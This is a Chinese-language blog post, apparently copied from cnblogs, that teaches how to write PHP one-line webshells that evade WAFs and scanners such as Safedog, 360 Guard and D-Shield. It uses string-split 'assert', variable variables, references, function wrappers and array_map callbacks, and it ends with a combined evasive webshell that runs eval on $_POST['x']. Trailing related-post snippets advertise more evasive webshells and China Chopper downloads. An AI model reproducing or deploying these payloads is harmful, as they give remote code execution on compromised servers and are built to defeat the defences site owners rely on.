【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路
00x1.关键字拆分
比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。
00x2.可变变量、引用、可变函数。
可变变量: 比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
测试结果:
总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!
引用: 比如$a=$_POST[‘x’];$b=&$a;@eval($b);
测试结果:
总结:这种方法与上一种方法类似。
可变函数 比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
测试结果:
总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~
00x3.添加其他代码
添加其他代码 比如 if(empty($a))
{
$a=$_POST[‘x’];
}@eval($a);
测试结果:
总结:这种方法比较适合脑洞比较大的小伙伴们~
00x4.函数替换。
使用其他函数,比如eval可以使用assert替换。
总结:这种方法适合eval函数被禁用时使用哦~
00x5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test($a){ //定义一个名为test的函数,并使用$a接受参数
eval($a);
}
test($_POST[‘x’]);
测试结果:
总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!
00x6.函数回调。
使用其他函数进行调用,并执行。
如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
测试结果:
总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~
00x7.利用各种方法的特性写出过WAF的一句话。
<?php
function test($a){ //利用所学的封装函数
if (empty($a)){ //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”; //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>
测试结果:
转自:https://www.cnblogs.com/xishaonian/p/6129002.html
【免杀】————1、PHP一句话过狗、卫士、D盾等免杀思路相关推荐
- 过新版狗php一句话,整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)...
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话) 发布时间:2020-06-20 00:54:04 来源:51CTO 阅读:3175 作者:gu ...
- 手游族迎来360手机卫士神助攻 玩家免打扰尽情发育
对于许多手游族而言,玩王者荣耀最大的bug莫过于突然跳出来的弹窗,哪怕那条"高温橙色预警"弹出的时间仅有1秒,都可以让剩下一丝血的鲁班惨叫身亡.弹窗这个王者荣耀的大敌是多少手游族心 ...
- d盾web查杀 linux,D盾扫描_D盾_Web查杀 [webshell查杀]
因为某些特殊目录无法删除,D盾_web查杀 加入了这类目录和文件的删除. 删除目录功能只能删除特殊的目录,如选定的目录不是特殊目录,此功能是无效的,防止误删除! 『D盾_Web查杀』 2015-07- ...
- 2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567
- 整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567
- 一句话木马(最新免杀php后门一句话)
各位同学 对 一句话木马 我写了第5篇了,没有绝对的安全 我们在完善中!啊哈哈 这段代码 可以被利用做后门 暂时免杀. 代码: <?php //t.php $test = $_GET['r']; ...
- php一句话过狗,整理的最新WebSHell (php過狗一句話,過狗菜刀,2016過狗一句話,2016php免殺一句話)...
中國菜刀下載,基於原版中國菜刀優化版20160309. 下載地址: China chopper 特別推薦的一個php一句話. 菜刀可以連接,過waf,過安全狗,D盾,360,php一句話木馬帶404頁 ...
- sqlmap绕过d盾_WEBSHELL免杀绕过WAF思路amp;方法(一)
本文主要介绍WEBSHELL免杀绕过的思路与方法,网上很多的方法基本都被安全厂家加入了检测规则已经不能免杀,所以我们要了解我们主要对手WAF的检测技术,故基于前人优秀基础上我们需要有能力衍生出免杀马, ...
- 【黑客免杀攻防】读书笔记6 - PE文件知识在免杀中的应用
0x1 PE文件与免杀思路 基于PE文件结构知识的免杀技术主要用于对抗启发式扫描. 通过修改PE文件中的一些关键点来达到欺骗反病毒软件的目的. 修改区段名 1.1 移动PE文件头位置免杀 工具:PeC ...
最新文章
- UIImage图片拉伸方法
- windows安装配置git和Tortoisegit
- shell 删除了hdfs 文件_知识干货 | 大数据全解 HDFS分布式文件系统
- ios个推透传消息json接收不到_消息通讯——Websocket
- [No0000B0]ReSharper操作指南1/16-入门与简介
- PowerDesigner生成数据库刷库脚本
- Kafka 与Spark的集成
- Qt5Widgetsd.lib(Qt5Widgetsd.dll) : fatalerror LNK1112: 模块计算机类型“x64”与目标计算机类型“X86”冲突
- 多线程并发编程之构建自定义同步工具
- snmp的oid查询方法
- php中求10递归算法,php递归算法
- 磁力链接搜索引擎源码下载
- Word中将数字和字母一次替换
- 计算机桌面的内存设置方法,计算机内存不足【处理方法】
- DM8更换产品授权,更换KEY
- 微信小程序春天来了 安卓程序员进入冬眠?
- linux 修复文件fsck,使用fsck检查并修复文件系统[Linux] | MOS86
- oul可以用作c语言常量吗,2016春北交《C语言程序设计(专) 》在线作业二
- Kindle4RSS.com - Kindle RSS新闻文章推送服务
- leetcode题解之相交链表